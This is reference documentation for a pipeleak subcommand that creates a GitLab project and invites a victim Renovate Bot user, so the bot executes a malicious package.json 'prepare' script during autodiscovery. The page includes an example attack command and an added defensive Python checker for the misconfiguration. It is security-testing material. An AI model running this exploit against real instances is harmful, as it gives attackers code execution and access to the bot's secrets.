Autodiscovery
pipeleak gl renovate autodiscovery
Create a PoC for exploiting Renovate autodiscovery misconfigurations
Synopsis
Create a project with a Renovate Bot configuration that will be picked up by an existing Renovate Bot user. The Renovate Bot then executes the 'prepare' script defined in package.json, which you can customize in exploit.sh.

    pipeleak gl renovate autodiscovery [flags]
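A defender-side check for the condition this command demonstrates, as an added example that is not part of pipeleak: it flags a bot configuration that autodiscovers without a filter, bot memberships outside approved namespaces, and install-time lifecycle scripts in a package.json. `autodiscover` and `autodiscoverFilter` are Renovate option names and `path_with_namespace` is the GitLab project field; the function names and all sample data are constructed for illustration.

```python
import json

# npm lifecycle hooks that run on install; the PoC described above uses "prepare".
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

def config_findings(bot_config):
    """Flag a bot config that processes every project the bot user is a member of."""
    if bot_config.get("autodiscover") and not bot_config.get("autodiscoverFilter"):
        return ["autodiscover is enabled without an autodiscoverFilter"]
    return []

def unexpected_projects(memberships, allowed_namespaces):
    """Projects the bot user belongs to that sit outside the approved namespaces."""
    allowed = tuple(ns.rstrip("/") + "/" for ns in allowed_namespaces)
    return [p["path_with_namespace"] for p in memberships
            if not p["path_with_namespace"].startswith(allowed)]

def lifecycle_scripts(package_json_text):
    """Lifecycle hooks defined in a package.json; empty if none or unparsable."""
    try:
        scripts = json.loads(package_json_text).get("scripts")
    except (json.JSONDecodeError, AttributeError):
        return []
    return [h for h in LIFECYCLE_HOOKS if isinstance(scripts, dict) and h in scripts]

# Constructed sample data (not taken from a real instance).
SAMPLE_CONFIG = {"platform": "gitlab", "autodiscover": True}
SAMPLE_MEMBERSHIPS = [  # shaped like GitLab project objects for the bot user
    {"path_with_namespace": "platform/api-gateway"},
    {"path_with_namespace": "jdoe/my-exploit-repo"},
]
SAMPLE_PACKAGE_JSON = '{"name": "demo", "scripts": {"prepare": "sh exploit.sh", "test": "jest"}}'

if __name__ == "__main__":
    print(config_findings(SAMPLE_CONFIG))
    print(unexpected_projects(SAMPLE_MEMBERSHIPS, ["platform"]))
    print(lifecycle_scripts(SAMPLE_PACKAGE_JSON))
```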
Examples
    # Create a project and invite the victim Renovate Bot user to it. Adds a malicious prepare script to package.json which is executed by the Renovate Bot during the renovation process.
    pipeleak gl renovate autodiscovery --token glpat-xxxxxxxxxxx --gitlab https://gitlab.mydomain.com --repoName my-exploit-repo --username renovate-bot-user
Options
    -h, --help              help for autodiscovery
    -r, --repoName string   The name for the created repository
    -u, --username string   The username of the victim Renovate Bot user to invite
Options inherited from parent commands
        --coloredLog       Output the human-readable log in color (default true)
    -g, --gitlab string    GitLab instance URL
        --json             Use JSON as log output format
    -l, --logfile string   Log output to a file
    -t, --token string     GitLab API Token
    -v, --verbose          Verbose logging
SEE ALSO